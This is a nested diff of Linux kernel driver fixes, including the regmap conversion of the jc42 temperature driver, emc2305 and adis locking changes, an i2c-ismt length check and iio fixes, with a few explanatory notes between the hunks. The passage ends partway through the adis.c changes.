+diff --git a/drivers/hwmon/Kconfig b/drivers/hwmon/Kconfig
+index 7ac3daaf59ce0..d3bccc8176c51 100644
+--- a/drivers/hwmon/Kconfig
++++ b/drivers/hwmon/Kconfig
+@@ -799,6 +799,7 @@ config SENSORS_IT87
+ config SENSORS_JC42
+ 	tristate "JEDEC JC42.4 compliant memory module temperature sensors"
+ 	depends on I2C
++	select REGMAP_I2C
+ 	help
+ 	  If you say yes here, you get support for JEDEC JC42.4 compliant
+ 	  temperature sensors, which are used on many DDR3 memory modules for
+diff --git a/drivers/hwmon/emc2305.c b/drivers/hwmon/emc2305.c
+index aa1f25add0b6b..e42ae43f3de46 100644
+--- a/drivers/hwmon/emc2305.c
++++ b/drivers/hwmon/emc2305.c
+@@ -16,7 +16,6 @@ static const unsigned short
+ emc2305_normal_i2c[] = { 0x27, 0x2c, 0x2d, 0x2e, 0x2f, 0x4c, 0x4d, I2C_CLIENT_END };
+ 
+ #define EMC2305_REG_DRIVE_FAIL_STATUS	0x27
+-#define EMC2305_REG_DEVICE		0xfd
+ #define EMC2305_REG_VENDOR		0xfe
+ #define EMC2305_FAN_MAX			0xff
+ #define EMC2305_FAN_MIN			0x00
+@@ -172,22 +171,12 @@ static int emc2305_get_max_state(struct thermal_cooling_device *cdev, unsigned l
+ 	return 0;
+ }
+ 
+-static int emc2305_set_cur_state(struct thermal_cooling_device *cdev, unsigned long state)
++static int __emc2305_set_cur_state(struct emc2305_data *data, int cdev_idx, unsigned long state)
+ {
+-	int cdev_idx, ret;
+-	struct emc2305_data *data = cdev->devdata;
++	int ret;
+ 	struct i2c_client *client = data->client;
+ 	u8 val, i;
+ 
+-	if (state > data->max_state)
+-		return -EINVAL;
+-
+-	cdev_idx =  emc2305_get_cdev_idx(cdev);
+-	if (cdev_idx < 0)
+-		return cdev_idx;
+-
+-	/* Save thermal state. */
+-	data->cdev_data[cdev_idx].last_thermal_state = state;
+ 	state = max_t(unsigned long, state, data->cdev_data[cdev_idx].last_hwmon_state);
+ 
+ 	val = EMC2305_PWM_STATE2DUTY(state, data->max_state, EMC2305_FAN_MAX);
+@@ -212,6 +201,27 @@ static int emc2305_set_cur_state(struct thermal_cooling_device *cdev, unsigned l
+ 	return 0;
+ }
+ 
++static int emc2305_set_cur_state(struct thermal_cooling_device *cdev, unsigned long state)
++{
++	int cdev_idx, ret;
++	struct emc2305_data *data = cdev->devdata;
++
++	if (state > data->max_state)
++		return -EINVAL;
++
++	cdev_idx =  emc2305_get_cdev_idx(cdev);
++	if (cdev_idx < 0)
++		return cdev_idx;
++
++	/* Save thermal state. */
++	data->cdev_data[cdev_idx].last_thermal_state = state;
++	ret = __emc2305_set_cur_state(data, cdev_idx, state);
++	if (ret < 0)
++		return ret;
++
++	return 0;
++}
++
+ static const struct thermal_cooling_device_ops emc2305_cooling_ops = {
+ 	.get_max_state = emc2305_get_max_state,
+ 	.get_cur_state = emc2305_get_cur_state,
+@@ -402,7 +412,7 @@ emc2305_write(struct device *dev, enum hwmon_sensor_types type, u32 attr, int ch
+ 				 */
+ 				if (data->cdev_data[cdev_idx].last_hwmon_state >=
+ 				    data->cdev_data[cdev_idx].last_thermal_state)
+-					return emc2305_set_cur_state(data->cdev_data[cdev_idx].cdev,
++					return __emc2305_set_cur_state(data, cdev_idx,
+ 							data->cdev_data[cdev_idx].last_hwmon_state);
+ 				return 0;
+ 			}
+@@ -524,7 +534,7 @@ static int emc2305_probe(struct i2c_client *client, const struct i2c_device_id *
+ 	struct device *dev = &client->dev;
+ 	struct emc2305_data *data;
+ 	struct emc2305_platform_data *pdata;
+-	int vendor, device;
++	int vendor;
+ 	int ret;
+ 	int i;
+ 
+@@ -535,10 +545,6 @@ static int emc2305_probe(struct i2c_client *client, const struct i2c_device_id *
+ 	if (vendor != EMC2305_VENDOR)
+ 		return -ENODEV;
+ 
+-	device = i2c_smbus_read_byte_data(client, EMC2305_REG_DEVICE);
+-	if (device != EMC2305_DEVICE)
+-		return -ENODEV;
+-
+ 	data = devm_kzalloc(dev, sizeof(*data), GFP_KERNEL);
+ 	if (!data)
+ 		return -ENOMEM;
+diff --git a/drivers/hwmon/jc42.c b/drivers/hwmon/jc42.c
+index 30888feaf589b..6593d81cb901b 100644
+--- a/drivers/hwmon/jc42.c
++++ b/drivers/hwmon/jc42.c
+@@ -19,6 +19,7 @@
+ #include <linux/err.h>
+ #include <linux/mutex.h>
+ #include <linux/of.h>
++#include <linux/regmap.h>
+ 
+ /* Addresses to scan */
+ static const unsigned short normal_i2c[] = {
+@@ -199,31 +200,14 @@ static struct jc42_chips jc42_chips[] = {
+ 	{ STM_MANID, STTS3000_DEVID, STTS3000_DEVID_MASK },
+ };
+ 
+-enum temp_index {
+-	t_input = 0,
+-	t_crit,
+-	t_min,
+-	t_max,
+-	t_num_temp
+-};
+-
+-static const u8 temp_regs[t_num_temp] = {
+-	[t_input] = JC42_REG_TEMP,
+-	[t_crit] = JC42_REG_TEMP_CRITICAL,
+-	[t_min] = JC42_REG_TEMP_LOWER,
+-	[t_max] = JC42_REG_TEMP_UPPER,
+-};
+-
+ /* Each client has this additional data */
+ struct jc42_data {
+-	struct i2c_client *client;
+ 	struct mutex	update_lock;	/* protect register access */
++	struct regmap	*regmap;
+ 	bool		extended;	/* true if extended range supported */
+ 	bool		valid;
+-	unsigned long	last_updated;	/* In jiffies */
+ 	u16		orig_config;	/* original configuration */
+ 	u16		config;		/* current configuration */
+-	u16		temp[t_num_temp];/* Temperatures */
+ };
+ 
+ #define JC42_TEMP_MIN_EXTENDED	(-40000)
+@@ -248,85 +232,102 @@ static int jc42_temp_from_reg(s16 reg)
+ 	return reg * 125 / 2;
+ }
+ 
+-static struct jc42_data *jc42_update_device(struct device *dev)
+-{
+-	struct jc42_data *data = dev_get_drvdata(dev);
+-	struct i2c_client *client = data->client;
+-	struct jc42_data *ret = data;
+-	int i, val;
+-
+-	mutex_lock(&data->update_lock);
+-
+-	if (time_after(jiffies, data->last_updated + HZ) || !data->valid) {
+-		for (i = 0; i < t_num_temp; i++) {
+-			val = i2c_smbus_read_word_swapped(client, temp_regs[i]);
+-			if (val < 0) {
+-				ret = ERR_PTR(val);
+-				goto abort;
+-			}
+-			data->temp[i] = val;
+-		}
+-		data->last_updated = jiffies;
+-		data->valid = true;
+-	}
+-abort:
+-	mutex_unlock(&data->update_lock);
+-	return ret;
+-}
+-
+ static int jc42_read(struct device *dev, enum hwmon_sensor_types type,
+ 		     u32 attr, int channel, long *val)
+ {
+-	struct jc42_data *data = jc42_update_device(dev);
+-	int temp, hyst;
++	struct jc42_data *data = dev_get_drvdata(dev);
++	unsigned int regval;
++	int ret, temp, hyst;
+ 
+-	if (IS_ERR(data))
+-		return PTR_ERR(data);
++	mutex_lock(&data->update_lock);
+ 
+ 	switch (attr) {
+ 	case hwmon_temp_input:
+-		*val = jc42_temp_from_reg(data->temp[t_input]);
+-		return 0;
++		ret = regmap_read(data->regmap, JC42_REG_TEMP, &regval);
++		if (ret)
++			break;
++
++		*val = jc42_temp_from_reg(regval);
++		break;
+ 	case hwmon_temp_min:
+-		*val = jc42_temp_from_reg(data->temp[t_min]);
+-		return 0;
++		ret = regmap_read(data->regmap, JC42_REG_TEMP_LOWER, &regval);
++		if (ret)
++			break;
++
++		*val = jc42_temp_from_reg(regval);
++		break;
+ 	case hwmon_temp_max:
+-		*val = jc42_temp_from_reg(data->temp[t_max]);
+-		return 0;
++		ret = regmap_read(data->regmap, JC42_REG_TEMP_UPPER, &regval);
++		if (ret)
++			break;
++
++		*val = jc42_temp_from_reg(regval);
++		break;
+ 	case hwmon_temp_crit:
+-		*val = jc42_temp_from_reg(data->temp[t_crit]);
+-		return 0;
++		ret = regmap_read(data->regmap, JC42_REG_TEMP_CRITICAL,
++				  &regval);
++		if (ret)
++			break;
++
++		*val = jc42_temp_from_reg(regval);
++		break;
+ 	case hwmon_temp_max_hyst:
+-		temp = jc42_temp_from_reg(data->temp[t_max]);
++		ret = regmap_read(data->regmap, JC42_REG_TEMP_UPPER, &regval);
++		if (ret)
++			break;
++
++		temp = jc42_temp_from_reg(regval);
+ 		hyst = jc42_hysteresis[(data->config & JC42_CFG_HYST_MASK)
+ 						>> JC42_CFG_HYST_SHIFT];
+ 		*val = temp - hyst;
+-		return 0;
++		break;
+ 	case hwmon_temp_crit_hyst:
+-		temp = jc42_temp_from_reg(data->temp[t_crit]);
++		ret = regmap_read(data->regmap, JC42_REG_TEMP_CRITICAL,
++				  &regval);
++		if (ret)
++			break;
++
++		temp = jc42_temp_from_reg(regval);
+ 		hyst = jc42_hysteresis[(data->config & JC42_CFG_HYST_MASK)
+ 						>> JC42_CFG_HYST_SHIFT];
+ 		*val = temp - hyst;
+-		return 0;
++		break;
+ 	case hwmon_temp_min_alarm:
+-		*val = (data->temp[t_input] >> JC42_ALARM_MIN_BIT) & 1;
+-		return 0;
++		ret = regmap_read(data->regmap, JC42_REG_TEMP, &regval);
++		if (ret)
++			break;
++
++		*val = (regval >> JC42_ALARM_MIN_BIT) & 1;
++		break;
+ 	case hwmon_temp_max_alarm:
+-		*val = (data->temp[t_input] >> JC42_ALARM_MAX_BIT) & 1;
+-		return 0;
++		ret = regmap_read(data->regmap, JC42_REG_TEMP, &regval);
++		if (ret)
++			break;
++
++		*val = (regval >> JC42_ALARM_MAX_BIT) & 1;
++		break;
+ 	case hwmon_temp_crit_alarm:
+-		*val = (data->temp[t_input] >> JC42_ALARM_CRIT_BIT) & 1;
+-		return 0;
++		ret = regmap_read(data->regmap, JC42_REG_TEMP, &regval);
++		if (ret)
++			break;
++
++		*val = (regval >> JC42_ALARM_CRIT_BIT) & 1;
++		break;
+ 	default:
+-		return -EOPNOTSUPP;
++		ret = -EOPNOTSUPP;
++		break;
+ 	}
++
++	mutex_unlock(&data->update_lock);
++
++	return ret;
+ }
+ 
+ static int jc42_write(struct device *dev, enum hwmon_sensor_types type,
+ 		      u32 attr, int channel, long val)
+ {
+ 	struct jc42_data *data = dev_get_drvdata(dev);
+-	struct i2c_client *client = data->client;
++	unsigned int regval;
+ 	int diff, hyst;
+ 	int ret;
+ 
+@@ -334,21 +335,23 @@ static int jc42_write(struct device *dev, enum hwmon_sensor_types type,
+ 
+ 	switch (attr) {
+ 	case hwmon_temp_min:
+-		data->temp[t_min] = jc42_temp_to_reg(val, data->extended);
+-		ret = i2c_smbus_write_word_swapped(client, temp_regs[t_min],
+-						   data->temp[t_min]);
++		ret = regmap_write(data->regmap, JC42_REG_TEMP_LOWER,
++				   jc42_temp_to_reg(val, data->extended));
+ 		break;
+ 	case hwmon_temp_max:
+-		data->temp[t_max] = jc42_temp_to_reg(val, data->extended);
+-		ret = i2c_smbus_write_word_swapped(client, temp_regs[t_max],
+-						   data->temp[t_max]);
++		ret = regmap_write(data->regmap, JC42_REG_TEMP_UPPER,
++				   jc42_temp_to_reg(val, data->extended));
+ 		break;
+ 	case hwmon_temp_crit:
+-		data->temp[t_crit] = jc42_temp_to_reg(val, data->extended);
+-		ret = i2c_smbus_write_word_swapped(client, temp_regs[t_crit],
+-						   data->temp[t_crit]);
++		ret = regmap_write(data->regmap, JC42_REG_TEMP_CRITICAL,
++				   jc42_temp_to_reg(val, data->extended));
+ 		break;
+ 	case hwmon_temp_crit_hyst:
++		ret = regmap_read(data->regmap, JC42_REG_TEMP_CRITICAL,
++				  &regval);
++		if (ret)
++			break;
++
+ 		/*
+ 		 * JC42.4 compliant chips only support four hysteresis values.
+ 		 * Pick best choice and go from there.
+@@ -356,7 +359,7 @@ static int jc42_write(struct device *dev, enum hwmon_sensor_types type,
+ 		val = clamp_val(val, (data->extended ? JC42_TEMP_MIN_EXTENDED
+ 						     : JC42_TEMP_MIN) - 6000,
+ 				JC42_TEMP_MAX);
+-		diff = jc42_temp_from_reg(data->temp[t_crit]) - val;
++		diff = jc42_temp_from_reg(regval) - val;
+ 		hyst = 0;
+ 		if (diff > 0) {
+ 			if (diff < 2250)
+@@ -368,9 +371,8 @@ static int jc42_write(struct device *dev, enum hwmon_sensor_types type,
+ 		}
+ 		data->config = (data->config & ~JC42_CFG_HYST_MASK) |
+ 				(hyst << JC42_CFG_HYST_SHIFT);
+-		ret = i2c_smbus_write_word_swapped(data->client,
+-						   JC42_REG_CONFIG,
+-						   data->config);
++		ret = regmap_write(data->regmap, JC42_REG_CONFIG,
++				   data->config);
+ 		break;
+ 	default:
+ 		ret = -EOPNOTSUPP;
+@@ -470,51 +472,80 @@ static const struct hwmon_chip_info jc42_chip_info = {
+ 	.info = jc42_info,
+ };
+ 
++static bool jc42_readable_reg(struct device *dev, unsigned int reg)
++{
++	return (reg >= JC42_REG_CAP && reg <= JC42_REG_DEVICEID) ||
++		reg == JC42_REG_SMBUS;
++}
++
++static bool jc42_writable_reg(struct device *dev, unsigned int reg)
++{
++	return (reg >= JC42_REG_CONFIG && reg <= JC42_REG_TEMP_CRITICAL) ||
++		reg == JC42_REG_SMBUS;
++}
++
++static bool jc42_volatile_reg(struct device *dev, unsigned int reg)
++{
++	return reg == JC42_REG_CONFIG || reg == JC42_REG_TEMP;
++}
++
++static const struct regmap_config jc42_regmap_config = {
++	.reg_bits = 8,
++	.val_bits = 16,
++	.val_format_endian = REGMAP_ENDIAN_BIG,
++	.max_register = JC42_REG_SMBUS,
++	.writeable_reg = jc42_writable_reg,
++	.readable_reg = jc42_readable_reg,
++	.volatile_reg = jc42_volatile_reg,
++	.cache_type = REGCACHE_RBTREE,
++};
++
+ static int jc42_probe(struct i2c_client *client)
+ {
+ 	struct device *dev = &client->dev;
+ 	struct device *hwmon_dev;
++	unsigned int config, cap;
+ 	struct jc42_data *data;
+-	int config, cap;
++	int ret;
+ 
+ 	data = devm_kzalloc(dev, sizeof(struct jc42_data), GFP_KERNEL);
+ 	if (!data)
+ 		return -ENOMEM;
+ 
+-	data->client = client;
++	data->regmap = devm_regmap_init_i2c(client, &jc42_regmap_config);
++	if (IS_ERR(data->regmap))
++		return PTR_ERR(data->regmap);
++
+ 	i2c_set_clientdata(client, data);
+ 	mutex_init(&data->update_lock);
+ 
+-	cap = i2c_smbus_read_word_swapped(client, JC42_REG_CAP);
+-	if (cap < 0)
+-		return cap;
++	ret = regmap_read(data->regmap, JC42_REG_CAP, &cap);
++	if (ret)
++		return ret;
+ 
+ 	data->extended = !!(cap & JC42_CAP_RANGE);
+ 
+ 	if (device_property_read_bool(dev, "smbus-timeout-disable")) {
+-		int smbus;
+-
+ 		/*
+ 		 * Not all chips support this register, but from a
+ 		 * quick read of various datasheets no chip appears
+ 		 * incompatible with the below attempt to disable
+ 		 * the timeout. And the whole thing is opt-in...
+ 		 */
+-		smbus = i2c_smbus_read_word_swapped(client, JC42_REG_SMBUS);
+-		if (smbus < 0)
+-			return smbus;
+-		i2c_smbus_write_word_swapped(client, JC42_REG_SMBUS,
+-					     smbus | SMBUS_STMOUT);
++		ret = regmap_set_bits(data->regmap, JC42_REG_SMBUS,
++				      SMBUS_STMOUT);
++		if (ret)
++			return ret;
+ 	}
+ 
+-	config = i2c_smbus_read_word_swapped(client, JC42_REG_CONFIG);
+-	if (config < 0)
+-		return config;
++	ret = regmap_read(data->regmap, JC42_REG_CONFIG, &config);
++	if (ret)
++		return ret;
+ 
+ 	data->orig_config = config;
+ 	if (config & JC42_CFG_SHUTDOWN) {
+ 		config &= ~JC42_CFG_SHUTDOWN;
+-		i2c_smbus_write_word_swapped(client, JC42_REG_CONFIG, config);
++		regmap_write(data->regmap, JC42_REG_CONFIG, config);
+ 	}
+ 	data->config = config;
+ 
+@@ -535,7 +566,7 @@ static void jc42_remove(struct i2c_client *client)
+ 
+ 		config = (data->orig_config & ~JC42_CFG_HYST_MASK)
+ 		  | (data->config & JC42_CFG_HYST_MASK);
+-		i2c_smbus_write_word_swapped(client, JC42_REG_CONFIG, config);
++		regmap_write(data->regmap, JC42_REG_CONFIG, config);
+ 	}
+ }
+ 
+@@ -546,8 +577,11 @@ static int jc42_suspend(struct device *dev)
+ 	struct jc42_data *data = dev_get_drvdata(dev);
+ 
+ 	data->config |= JC42_CFG_SHUTDOWN;
+-	i2c_smbus_write_word_swapped(data->client, JC42_REG_CONFIG,
+-				     data->config);
++	regmap_write(data->regmap, JC42_REG_CONFIG, data->config);
++
++	regcache_cache_only(data->regmap, true);
++	regcache_mark_dirty(data->regmap);
++
+ 	return 0;
+ }
+ 
+@@ -555,10 +589,13 @@ static int jc42_resume(struct device *dev)
+ {
+ 	struct jc42_data *data = dev_get_drvdata(dev);
+ 
++	regcache_cache_only(data->regmap, false);
++
+ 	data->config &= ~JC42_CFG_SHUTDOWN;
+-	i2c_smbus_write_word_swapped(data->client, JC42_REG_CONFIG,
+-				     data->config);
+-	return 0;
++	regmap_write(data->regmap, JC42_REG_CONFIG, data->config);
++
++	/* Restore cached register values to hardware */
++	return regcache_sync(data->regmap);
+ }
+ 
+ static const struct dev_pm_ops jc42_dev_pm_ops = {
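
The suspend/resume pair above leans on the regcache added with the regmap conversion: regcache_cache_only() serves I/O from the cache while the sensor is shut down, regcache_mark_dirty() flags the cached values for rewrite, and regcache_sync() replays them on resume. Volatile registers (CONFIG and TEMP here) bypass the cache, which is why resume rewrites CONFIG explicitly before syncing. A condensed sketch of the pattern:

#include <linux/regmap.h>

static int example_suspend(struct regmap *map)
{
	regcache_cache_only(map, true);	/* serve I/O from the cache */
	regcache_mark_dirty(map);	/* replay everything on next sync */
	return 0;
}

static int example_resume(struct regmap *map)
{
	regcache_cache_only(map, false);
	return regcache_sync(map);	/* write cached values back */
}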
+diff --git a/drivers/hwmon/nct6775-platform.c b/drivers/hwmon/nct6775-platform.c
+index b347837842139..bf43f73dc835f 100644
+--- a/drivers/hwmon/nct6775-platform.c
++++ b/drivers/hwmon/nct6775-platform.c
+@@ -1043,7 +1043,9 @@ static struct platform_device *pdev[2];
+ 
+ static const char * const asus_wmi_boards[] = {
+ 	"PRO H410T",
++	"ProArt B550-CREATOR",
+ 	"ProArt X570-CREATOR WIFI",
++	"ProArt Z490-CREATOR 10G",
+ 	"Pro B550M-C",
+ 	"Pro WS X570-ACE",
+ 	"PRIME B360-PLUS",
+@@ -1055,8 +1057,10 @@ static const char * const asus_wmi_boards[] = {
+ 	"PRIME X570-P",
+ 	"PRIME X570-PRO",
+ 	"ROG CROSSHAIR VIII DARK HERO",
++	"ROG CROSSHAIR VIII EXTREME",
+ 	"ROG CROSSHAIR VIII FORMULA",
+ 	"ROG CROSSHAIR VIII HERO",
++	"ROG CROSSHAIR VIII HERO (WI-FI)",
+ 	"ROG CROSSHAIR VIII IMPACT",
+ 	"ROG STRIX B550-A GAMING",
+ 	"ROG STRIX B550-E GAMING",
+@@ -1080,8 +1084,11 @@ static const char * const asus_wmi_boards[] = {
+ 	"ROG STRIX Z490-G GAMING (WI-FI)",
+ 	"ROG STRIX Z490-H GAMING",
+ 	"ROG STRIX Z490-I GAMING",
++	"TUF GAMING B550M-E",
++	"TUF GAMING B550M-E (WI-FI)",
+ 	"TUF GAMING B550M-PLUS",
+ 	"TUF GAMING B550M-PLUS (WI-FI)",
++	"TUF GAMING B550M-PLUS WIFI II",
+ 	"TUF GAMING B550-PLUS",
+ 	"TUF GAMING B550-PLUS WIFI II",
+ 	"TUF GAMING B550-PRO",
+diff --git a/drivers/hwtracing/coresight/coresight-cti-core.c b/drivers/hwtracing/coresight/coresight-cti-core.c
+index c6e8c6542f24b..d2cf4f4848e1b 100644
+--- a/drivers/hwtracing/coresight/coresight-cti-core.c
++++ b/drivers/hwtracing/coresight/coresight-cti-core.c
+@@ -564,7 +564,7 @@ static void cti_add_assoc_to_csdev(struct coresight_device *csdev)
+ 			 * if we found a matching csdev then update the ECT
+ 			 * association pointer for the device with this CTI.
+ 			 */
+-			coresight_set_assoc_ectdev_mutex(csdev->ect_dev,
++			coresight_set_assoc_ectdev_mutex(csdev,
+ 							 ect_item->csdev);
+ 			break;
+ 		}
+diff --git a/drivers/hwtracing/coresight/coresight-trbe.c b/drivers/hwtracing/coresight/coresight-trbe.c
+index 2b386bb848f8d..1fc4fd79a1c69 100644
+--- a/drivers/hwtracing/coresight/coresight-trbe.c
++++ b/drivers/hwtracing/coresight/coresight-trbe.c
+@@ -1434,6 +1434,7 @@ static int arm_trbe_probe_cpuhp(struct trbe_drvdata *drvdata)
+ 
+ static void arm_trbe_remove_cpuhp(struct trbe_drvdata *drvdata)
+ {
++	cpuhp_state_remove_instance(drvdata->trbe_online, &drvdata->hotplug_node);
+ 	cpuhp_remove_multi_state(drvdata->trbe_online);
+ }
+ 
+diff --git a/drivers/i2c/busses/i2c-ismt.c b/drivers/i2c/busses/i2c-ismt.c
+index fe2349590f75e..c74985d77b0ec 100644
+--- a/drivers/i2c/busses/i2c-ismt.c
++++ b/drivers/i2c/busses/i2c-ismt.c
+@@ -509,6 +509,9 @@ static int ismt_access(struct i2c_adapter *adap, u16 addr,
+ 		if (read_write == I2C_SMBUS_WRITE) {
+ 			/* Block Write */
+ 			dev_dbg(dev, "I2C_SMBUS_BLOCK_DATA:  WRITE\n");
++			if (data->block[0] < 1 || data->block[0] > I2C_SMBUS_BLOCK_MAX)
++				return -EINVAL;
++
+ 			dma_size = data->block[0] + 1;
+ 			dma_direction = DMA_TO_DEVICE;
+ 			desc->wr_len_cmd = dma_size;
+diff --git a/drivers/i2c/busses/i2c-pxa-pci.c b/drivers/i2c/busses/i2c-pxa-pci.c
+index f614cade432bb..30e38bc8b6db8 100644
+--- a/drivers/i2c/busses/i2c-pxa-pci.c
++++ b/drivers/i2c/busses/i2c-pxa-pci.c
+@@ -105,7 +105,7 @@ static int ce4100_i2c_probe(struct pci_dev *dev,
+ 	int i;
+ 	struct ce4100_devices *sds;
+ 
+-	ret = pci_enable_device_mem(dev);
++	ret = pcim_enable_device(dev);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -114,10 +114,8 @@ static int ce4100_i2c_probe(struct pci_dev *dev,
+ 		return -EINVAL;
+ 	}
+ 	sds = kzalloc(sizeof(*sds), GFP_KERNEL);
+-	if (!sds) {
+-		ret = -ENOMEM;
+-		goto err_mem;
+-	}
++	if (!sds)
++		return -ENOMEM;
+ 
+ 	for (i = 0; i < ARRAY_SIZE(sds->pdev); i++) {
+ 		sds->pdev[i] = add_i2c_device(dev, i);
+@@ -133,8 +131,6 @@ static int ce4100_i2c_probe(struct pci_dev *dev,
+ 
+ err_dev_add:
+ 	kfree(sds);
+-err_mem:
+-	pci_disable_device(dev);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/i2c/muxes/i2c-mux-reg.c b/drivers/i2c/muxes/i2c-mux-reg.c
+index 0e0679f65cf77..30a6de1694e07 100644
+--- a/drivers/i2c/muxes/i2c-mux-reg.c
++++ b/drivers/i2c/muxes/i2c-mux-reg.c
+@@ -183,13 +183,12 @@ static int i2c_mux_reg_probe(struct platform_device *pdev)
+ 	if (!mux->data.reg) {
+ 		dev_info(&pdev->dev,
+ 			"Register not set, using platform resource\n");
+-		res = platform_get_resource(pdev, IORESOURCE_MEM, 0);
+-		mux->data.reg_size = resource_size(res);
+-		mux->data.reg = devm_ioremap_resource(&pdev->dev, res);
++		mux->data.reg = devm_platform_get_and_ioremap_resource(pdev, 0, &res);
+ 		if (IS_ERR(mux->data.reg)) {
+ 			ret = PTR_ERR(mux->data.reg);
+ 			goto err_put_parent;
+ 		}
++		mux->data.reg_size = resource_size(res);
+ 	}
+ 
+ 	if (mux->data.reg_size != 4 && mux->data.reg_size != 2 &&
+diff --git a/drivers/iio/adc/ad_sigma_delta.c b/drivers/iio/adc/ad_sigma_delta.c
+index 261a9a6b45e15..d8570f620785a 100644
+--- a/drivers/iio/adc/ad_sigma_delta.c
++++ b/drivers/iio/adc/ad_sigma_delta.c
+@@ -281,10 +281,10 @@ int ad_sigma_delta_single_conversion(struct iio_dev *indio_dev,
+ 	unsigned int data_reg;
+ 	int ret = 0;
+ 
+-	if (iio_buffer_enabled(indio_dev))
+-		return -EBUSY;
++	ret = iio_device_claim_direct_mode(indio_dev);
++	if (ret)
++		return ret;
+ 
+-	mutex_lock(&indio_dev->mlock);
+ 	ad_sigma_delta_set_channel(sigma_delta, chan->address);
+ 
+ 	spi_bus_lock(sigma_delta->spi->master);
+@@ -323,7 +323,7 @@ out:
+ 	ad_sigma_delta_set_mode(sigma_delta, AD_SD_MODE_IDLE);
+ 	sigma_delta->bus_locked = false;
+ 	spi_bus_unlock(sigma_delta->spi->master);
+-	mutex_unlock(&indio_dev->mlock);
++	iio_device_release_direct_mode(indio_dev);
+ 
+ 	if (ret)
+ 		return ret;
+diff --git a/drivers/iio/adc/ti-adc128s052.c b/drivers/iio/adc/ti-adc128s052.c
+index 622fd384983c7..b3d5b9b7255bc 100644
+--- a/drivers/iio/adc/ti-adc128s052.c
++++ b/drivers/iio/adc/ti-adc128s052.c
+@@ -181,13 +181,13 @@ static int adc128_probe(struct spi_device *spi)
+ }
+ 
+ static const struct of_device_id adc128_of_match[] = {
+-	{ .compatible = "ti,adc128s052", },
+-	{ .compatible = "ti,adc122s021", },
+-	{ .compatible = "ti,adc122s051", },
+-	{ .compatible = "ti,adc122s101", },
+-	{ .compatible = "ti,adc124s021", },
+-	{ .compatible = "ti,adc124s051", },
+-	{ .compatible = "ti,adc124s101", },
++	{ .compatible = "ti,adc128s052", .data = (void*)0L, },
++	{ .compatible = "ti,adc122s021", .data = (void*)1L, },
++	{ .compatible = "ti,adc122s051", .data = (void*)1L, },
++	{ .compatible = "ti,adc122s101", .data = (void*)1L, },
++	{ .compatible = "ti,adc124s021", .data = (void*)2L, },
++	{ .compatible = "ti,adc124s051", .data = (void*)2L, },
++	{ .compatible = "ti,adc124s101", .data = (void*)2L, },
+ 	{ /* sentinel */ },
+ };
+ MODULE_DEVICE_TABLE(of, adc128_of_match);
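
Storing a variant index in each of_device_id's .data field lets probe pick the right channel layout without string matching. On the lookup side the driver would retrieve it roughly like this (a sketch; device_get_match_data() is the generic accessor, and the adc128_config table name is assumed for illustration):

	unsigned long type = (uintptr_t)device_get_match_data(&spi->dev);
	const struct adc128_configuration *config = &adc128_config[type];
	/* type 0: adc128s052, type 1: adc122s0x1, type 2: adc124s0x1 */
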
+diff --git a/drivers/iio/addac/ad74413r.c b/drivers/iio/addac/ad74413r.c
+index 899bcd83f40bc..e0e130ba9d3ec 100644
+--- a/drivers/iio/addac/ad74413r.c
++++ b/drivers/iio/addac/ad74413r.c
+@@ -691,7 +691,7 @@ static int ad74413_get_input_current_offset(struct ad74413r_state *st,
+ 	if (ret)
+ 		return ret;
+ 
+-	*val = voltage_offset * AD74413R_ADC_RESULT_MAX / voltage_range;
++	*val = voltage_offset * (int)AD74413R_ADC_RESULT_MAX / voltage_range;
+ 
+ 	return IIO_VAL_INT;
+ }
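
The one-character cast in the ad74413r hunk matters because AD74413R_ADC_RESULT_MAX expands to a GENMASK()-style unsigned constant: multiplying a negative int by it promotes the int to unsigned, and the offset silently becomes a huge positive value. A runnable demonstration with a stand-in macro (LP64 assumed):

	#include <stdio.h>

	#define ADC_RESULT_MAX ((1UL << 16) - 1)	/* stand-in for a GENMASK() macro */

	int main(void)
	{
		int voltage_offset = -2500, voltage_range = 5250;
		long bad  = voltage_offset * ADC_RESULT_MAX / voltage_range;       /* unsigned math */
		long good = voltage_offset * (int)ADC_RESULT_MAX / voltage_range;  /* signed math */

		/* bad is a huge bogus positive value; good is -31207 */
		printf("bad=%ld good=%ld\n", bad, good);
		return 0;
	}
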
+diff --git a/drivers/iio/imu/adis.c b/drivers/iio/imu/adis.c
+index f7fcfd04f659d..bc40240b29e26 100644
+--- a/drivers/iio/imu/adis.c
++++ b/drivers/iio/imu/adis.c
+@@ -270,23 +270,19 @@ EXPORT_SYMBOL_NS(adis_debugfs_reg_access, IIO_ADISLIB);
+ #endif
+ 
+ /**
+- * adis_enable_irq() - Enable or disable data ready IRQ
++ * __adis_enable_irq() - Enable or disable data ready IRQ (unlocked)
+  * @adis: The adis device
+  * @enable: Whether to enable the IRQ
+  *
+  * Returns 0 on success, negative error code otherwise
+  */
+-int adis_enable_irq(struct adis *adis, bool enable)
++int __adis_enable_irq(struct adis *adis, bool enable)
+ {
+-	int ret = 0;
++	int ret;
+ 	u16 msc;
+ 
+-	mutex_lock(&adis->state_lock);
+-
+-	if (adis->data->enable_irq) {
+-		ret = adis->data->enable_irq(adis, enable);
+-		goto out_unlock;
+-	}
++	if (adis->data->enable_irq)
++		return adis->data->enable_irq(adis, enable);
+ 
+ 	if (adis->data->unmasked_drdy) {
+ 		if (enable)
+@@ -294,12 +290,12 @@ int adis_enable_irq(struct adis *adis, bool enable)
+ 		else
+ 			disable_irq(adis->spi->irq);
+ 
+-		goto out_unlock;
++		return 0;
+ 	}
+ 
+ 	ret = __adis_read_reg_16(adis, adis->data->msc_ctrl_reg, &msc);
+ 	if (ret)
+-		goto out_unlock;
++		return ret;
+ 
+ 	msc |= ADIS_MSC_CTRL_DATA_RDY_POL_HIGH;
+ 	msc &= ~ADIS_MSC_CTRL_DATA_RDY_DIO2;
+@@ -308,13 +304,9 @@ int adis_enable_irq(struct adis *adis, bool enable)
+ 	else
+ 		msc &= ~ADIS_MSC_CTRL_DATA_RDY_EN;
+ 
+-	ret = __adis_write_reg_16(adis, adis->data->msc_ctrl_reg, msc);
+-
+-out_unlock:
+-	mutex_unlock(&adis->state_lock);
+-	return ret;
++	return __adis_write_reg_16(adis, adis->data->msc_ctrl_reg, msc);
+ }
+-EXPORT_SYMBOL_NS(adis_enable_irq, IIO_ADISLIB);
++EXPORT_SYMBOL_NS(__adis_enable_irq, IIO_ADISLIB);
+ 
+ /**
+  * __adis_check_status() - Check the device for error conditions (unlocked)
+@@ -445,7 +437,7 @@ int __adis_initial_startup(struct adis *adis)
